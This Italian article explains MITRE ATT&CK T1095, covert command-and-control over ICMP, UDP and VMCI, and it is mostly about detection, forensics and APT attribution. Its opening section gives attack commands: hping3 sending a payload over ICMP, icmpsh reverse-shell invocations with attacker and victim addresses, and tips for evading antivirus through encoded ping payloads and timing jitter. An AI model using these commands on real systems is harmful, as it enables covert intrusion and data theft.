Protocolli Non-Application Layer: Non-Application Layer Protocol (T1095)

Replicare attacchi basati su protocolli non-application layer richiede una profonda comprensione dello stack di rete. Il tunneling ICMP rappresenta il punto di partenza più accessibile.

Su Linux, hping3 permette di inviare dati arbitrari attraverso ICMP echo request: hping3 -1 -E payload.txt -d 1024 target.com. Per tunneling più sofisticato, icmpsh crea una reverse shell completa: sul server ./icmpsh-m.py <attacker-ip> <victim-ip>, mentre sul client Windows icmpsh.exe -t <attacker-ip>.

Python con Scapy offre controllo granulare per crafting di pacchetti custom. Un semplice tunnel UDP si implementa creando socket raw: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP). Cobalt Strike supporta nativamente profili C2 su protocolli alternativi attraverso Malleable C2 profiles, permettendo di specificare transform blocks per ICMP o UDP.

Per ambienti ESXi, la simulazione di comunicazioni VMCI richiede accesso privilegiato all'hypervisor. Il comando vsish -e get /vmkModules/vmci/commands enumera le porte VMCI attive. Tool come vmci_sockets permettono di creare backdoor che comunicano direttamente tra guest e host, bypassando completamente lo stack di rete tradizionale.

La persistenza si ottiene combinando questi canali con tecniche di autostart. Su Windows, scheduled task che eseguono periodicamente ping con payload codificato nel campo data rimangono sotto il radar della maggior parte degli AV. L'encoding Base64 o XOR dei dati trasmessi aumenta l'evasione, mentre l'uso di timing jitter (variazioni casuali negli intervalli) evita pattern detection.

La detection di protocolli non-application layer richiede visibilità profonda sul traffico di rete. Zeek rappresenta lo strumento ideale con i suoi log specializzati icmp.log e weird.log che catturano anomalie protocollari.

Un alert efficace monitora il rapporto tra traffico in uscita e in entrata. Query Zeek come icmp.log | where id.orig_h in internal_nets and payload_len > 0 identificano ICMP con payload sospetti. La baseline del traffico ICMP legittimo (tipicamente solo echo request/reply da tool di monitoring) facilita l'identificazione di outlier.

Per Windows, Sysmon EventID 3 cattura connessioni di rete includendo protocollo e processo. La correlazione tra processi non-standard che generano traffico ICMP/UDP rivela potenziali tunneling. PowerShell che genera traffico UDP su porte non standard merita investigazione immediata.

Il monitoraggio di VMCI in ambienti ESXi richiede parsing dei log vmkernel. Pattern come VMCI: socket seguito da processi non-VMware indicano possibile compromissione. L'implementazione di regole sul volume di dati trasferiti (soglia 1MB su ICMP in 5 minuti) riduce i falsi positivi mantenendo efficacia.

Gli indicatori comportamentali superano le signature statiche. Sessioni ICMP di lunga durata (>5 minuti), pacchetti ICMP di dimensioni fisse ripetute, o UDP su porte casuali con pattern di comunicazione regolari suggeriscono C2 attivo. L'analisi dell'entropia del payload distingue dati casuali da contenuto strutturato tipico del tunneling.

L'integrazione con threat intelligence contestualizza gli alert. IP destination associate a infrastrutture APT note o appartenenti a VPS provider economici aumentano la priorità. La correlazione temporale con altri indicatori (nuovo processo, connessione RDP precedente) conferma la compromissione.

L'analisi forense di comunicazioni su protocolli non-application layer inizia dall'acquisizione di PCAP completi. Wireshark con filtri come icmp.type==8 and data.len>0 isola traffico ICMP con payload, mentre udp.length>8 and !dns identifica UDP sospetto.

Su Windows, l'analisi di Prefetch files rivela esecuzioni di tool come ping.exe con frequenza anomala. I Windows Event Logs, specificamente Security EventID 5156 (Windows Filtering Platform), registrano connessioni permesse includendo protocollo e direzione. La correlazione temporale con EventID 4688 (process creation) ricostruisce la catena di esecuzione.

Per Linux, auditd con regole su syscall socket e sendto cattura creazione di raw socket. Il comando ausearch -sc socket -sc sendto -ts recent recupera eventi recenti. L'analisi di /proc/net/raw su immagini di memoria identifica socket aperti al momento dell'acquisizione.

In ambienti virtualizzati, i log ESXi vmkernel contengono tracce di comunicazioni VMCI. Pattern come vmci_socket_create seguito da trasferimenti di dati anomali indicano abuso del canale. L'estrazione di vmware.log dalle VM guest può rivelare comandi inviati attraverso il backdoor.

La ricostruzione del contenuto trasmesso richiede reassembly dei pacchetti e decodifica. Tool come NetworkMiner automatizzano l'estrazione, ma payload custom richiedono analisi manuale. Python script che implementano XOR o algoritmi di decodifica proprietari spesso si trovano sul sistema compromesso.

L'analisi temporale rivela pattern di beaconing. Grafici di comunicazione nel tempo mostrano intervalli regolari tipici di C2 automatizzati. La correlazione con altri artefatti (file creati, registry modificate) durante picchi di traffico conferma l'esfiltrazione o ricezione di comandi.

L'uso di protocolli non-application layer caratterizza APT sofisticati con capacità di sviluppo custom. APT3 (Cina) utilizza downloader con connessioni SOCKS5 native, indicando infrastruttura C2 modulare. HAFNIUM, responsabile degli attacchi Exchange del 2021, implementa canali TCP raw per maggiore controllo sul traffico.

UNC3886 rappresenta l'evoluzione della tecnica con l'abuso di VMCI in ambienti ESXi. Questo gruppo, probabilmente affiliato al governo cinese, dimostra profonda conoscenza delle tecnologie di virtualizzazione. La loro capacità di mantenere persistenza attraverso canali invisibili al monitoring di rete tradizionale suggerisce risorse significative e obiettivi di lungo termine.

Pattern geografici emergono dall'analisi: gruppi cinesi (APT3, Mustang Panda, HAFNIUM) prediligono protocolli TCP/UDP custom, mentre attori russi come Gamaredon utilizzano SOCKS5 su porte non standard. ToddyCat, attivo dal 2020, implementa backdoor passivi che ricevono comandi via UDP, tecnica che minimizza il traffico in uscita evitando detection.

L'overlap di tool rivela possibili condivisioni o evoluzioni. PlugX, utilizzato da multipli gruppi cinesi, supporta nativamente raw TCP/UDP. Cobalt Strike, onnipresente, viene customizzato con profili C2 su ICMP. L'emergere di tool open-source come Sliver con supporto nativo per protocolli alternativi democratizza queste capacità.

Trend futuri puntano verso l'abuso di protocolli IoT e industriali. MQTT, CoAP e protocolli SCADA offrono cover perfetta in ambienti OT. L'integrazione di machine learning per generare pattern di traffico che mimano comportamenti legittimi rappresenta la prossima evoluzione. Gruppi targeting infrastructure critiche investiranno in capacità di tunneling attraverso protocolli industriali specifici del settore target.

Framework MITRE ATT&CK T1095 - Non-Application Layer Protocol. Documentazione ufficiale su 12 gruppi APT e 86 malware che implementano tunneling attraverso protocolli di rete non applicativi. Include dettagli su campagne Cutting Edge (2023-2024) di UNC3886/UNC5221 e Operation Wocao che dimostrano evoluzione verso VMCI e protocolli custom. Riferimenti specifici per detection tramite analisi comportamentale di traffico ICMP/UDP anomalo e configurazioni di hardening per ambienti ESXi.